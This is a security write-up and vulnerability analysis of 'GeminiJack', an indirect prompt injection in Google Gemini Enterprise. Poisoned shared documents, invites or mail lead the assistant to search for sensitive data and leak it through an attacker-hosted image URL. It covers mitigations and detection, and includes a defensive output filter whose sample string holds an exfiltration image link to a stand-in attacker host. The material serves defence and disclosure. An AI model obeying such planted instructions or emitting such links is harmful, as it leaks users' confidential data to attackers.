Full Report
AI tools are being integrated deeper and deeper into our workflows. As this happens, the attack surface opens up: the bot can be tricked into doing malicious things with attacker-controlled input. Google Docs, Google Calendar, Mail and many other products are now sources of potentially malicious input. Google Gemini Enterprise integrates all of these Google products into Gemini for use, and this is where the bug begins.

Google Gemini Enterprise AI contains a Retrieval-Augmented Generation (RAG) architecture that allows organizations to query mail, calendar, docs and other Google Workspace components. When a user makes a query, Gemini searches the configured data sources for relevant content, matches the content, loads it into the agent's context and generates contextual responses from it. The data sources for the RAG system must be preconfigured by the enterprise admin, so there is a lot of trust placed in this content. By placing a prompt injection within one of the returned data sources, an attacker can add malicious instructions to the content. This can be a meeting invite, a shared Google Doc and many other things.

What can this do? By adding an image hosted on an attacker-controlled remote server and asking the AI to include retrieved data as part of the image URL, RAG-based information can be stolen. This leads to data exfiltration.

I find that "zero-click" is the wrong word. It still requires user interaction to exploit, but the user doesn't need to click on a specific attacker-controlled link. To me, zero click means that a user has to do nothing. Maybe 0.5 clicks is better. Still, this is really impactful and interesting! There's an assumption that prompt injection is always possible. So, content isolation and more permissions seem like the future of security here.
Analysis Summary
# Vulnerability: GeminiJack - Indirect Prompt Injection in Google Gemini Enterprise
## CVE Details
- **CVE ID:** Not assigned (Identified as an architectural vulnerability in RAG workflows)
- **CVSS Score:** N/A (High Impact)
- **CWE:** CWE-506 (Embedded Malicious Code), CWE-116 (Improper Encoding or Escaping of Output), and Indirect Prompt Injection
## Affected Systems
- **Products:** Google Gemini Enterprise, Google Vertex AI Search (VAIS)
- **Versions:** All versions prior to full mitigation (Mitigated around September 2025)
- **Configurations:** Systems integrated with Google Workspace (Gmail, Calendar, Docs) where the Retrieval-Augmented Generation (RAG) system is enabled to query external or shared content.
## Vulnerability Description
GeminiJack is an architectural flaw in the way enterprise AI systems process retrieved data. The vulnerability leverages **Indirect Prompt Injection**. When an attacker shares a poisoned artifact (such as a Google Doc, Calendar invite, or Email) containing hidden malicious instructions, the Gemini RAG system retrieves this content during a legitimate user query.
Because the AI fails to distinguish between "system instructions" and "retrieved data," it executes the commands embedded in the document. These instructions typically direct the AI to search for sensitive corporate data (e.g., "budgets," "API keys") and exfiltrate that data by appending it to a remote image URL (Markdown/HTML rendering) controlled by the attacker.
## Exploitation
- **Status:** PoC available (Reported by Noma Labs; mitigated by Google)
- **Complexity:** Medium (Requires crafting a persuasive or hidden prompt within a shared document)
- **Attack Vector:** Network (External sharing of Workspace files/invites)
## Impact
- **Confidentiality:** **High** (Allows exfiltration of years of emails, calendar history, and confidential document repositories)
- **Integrity:** **Low/Medium** (The AI can be tricked into providing misleading summaries based on poisoned content)
- **Availability:** **Low** (Does not typically result in service denial)
## Remediation
### Patches
- **Vendor Update:** Google has deployed server-side updates to address instruction/content confusion in the RAG pipeline.
- **Architectural Change:** Vertex AI Search (VAIS) has been fully separated from Gemini Enterprise to prevent shared LLM-powered context leaks.
### Workarounds
- **Strict Sharing Policies:** Restrict the ability of internal users to accept shared documents or calendar invites from external domains.
- **RAG Scoping:** Use the principle of least privilege to limit the data sources Gemini can access for specific users.
## Detection
- **Indicators of Compromise:**
  - Unexpected outbound requests to unknown third-party domains originating from AI-rendered content (specifically image load requests containing long query strings).
  - Presence of "Search-Redirect" instructions within retrieved documents (e.g., text hidden in white font or metadata).
- **Detection Methods:** Monitor for unusual patterns in AI retrieval logs where the agent performs multiple secondary searches immediately after retrieving an external document.
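The exfiltration channel described in the Vulnerability Description (retrieved data appended to an attacker-controlled image URL) and the first indicator above (image loads with long query strings) can both be addressed with an output filter that runs before the chat UI renders the model's answer. The following is an added illustration, not Google's or Noma's code; the allowlisted host, the 64-character threshold and the sample answer are constructed assumptions.

```python
from __future__ import annotations
import re
from urllib.parse import urlparse

# Assumed allowlist of hosts the chat UI may load images from (placeholder).
ALLOWED_IMAGE_HOSTS = {"images.corp.example"}
MAX_QUERY_LEN = 64  # longer query strings are treated as a possible data channel

# Markdown ![alt](url) and HTML <img src="url"> references in model output.
_MD_IMG = re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)[^)]*\)")
_HTML_IMG = re.compile(r"<img\b[^>]*\bsrc\s*=\s*[\"']([^\"']+)[\"'][^>]*>", re.I)

def classify_image_url(url: str) -> str | None:
    """Return why the URL must not be rendered, or None if it is acceptable."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if parsed.scheme not in ("http", "https"):
        return "non-http scheme"
    if host not in ALLOWED_IMAGE_HOSTS:
        return f"host not allowlisted: {host}"
    if len(parsed.query) > MAX_QUERY_LEN:
        return f"query string too long ({len(parsed.query)} chars)"
    return None

def sanitize_model_output(text: str) -> tuple[str, list[dict]]:
    """Strip image references that could carry retrieved data off-site.
    Returns the rewritten text plus a findings list for the detection log."""
    findings: list[dict] = []

    def _replace(match: re.Match, kind: str) -> str:
        url = match.group(1)
        reason = classify_image_url(url)
        if reason is None:
            return match.group(0)  # allowlisted and short: render as-is
        findings.append({"kind": kind, "url": url, "reason": reason})
        return "[image removed by output filter]"

    text = _MD_IMG.sub(lambda m: _replace(m, "markdown"), text)
    text = _HTML_IMG.sub(lambda m: _replace(m, "html"), text)
    return text, findings

# Constructed sample answer: a legitimate logo, an attacker pixel carrying
# retrieved calendar data, and an allowlisted host with an oversized query.
SAMPLE_OUTPUT = (
    "Here is the summary you asked for.\n"
    "![logo](https://images.corp.example/logo.png)\n"
    "![ ](https://collector.attacker.example/p.png?d="
    "Q3%20budget%20meeting%2C%20API%20key%20rotation)\n"
    '<img src="https://images.corp.example/a.png?s=' + "A" * 120 + '">'
)
```

Each removed reference is returned as a finding so the rendering layer can forward it to the same log the Detection Methods entry recommends watching.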
## References
- **Noma Security Blog:** hxxps[://]noma[.]security/geminijack-google-gemini-zero-click-vulnerability/
- **Noma Labs Research:** hxxps[://]noma[.]security/blog/category/education/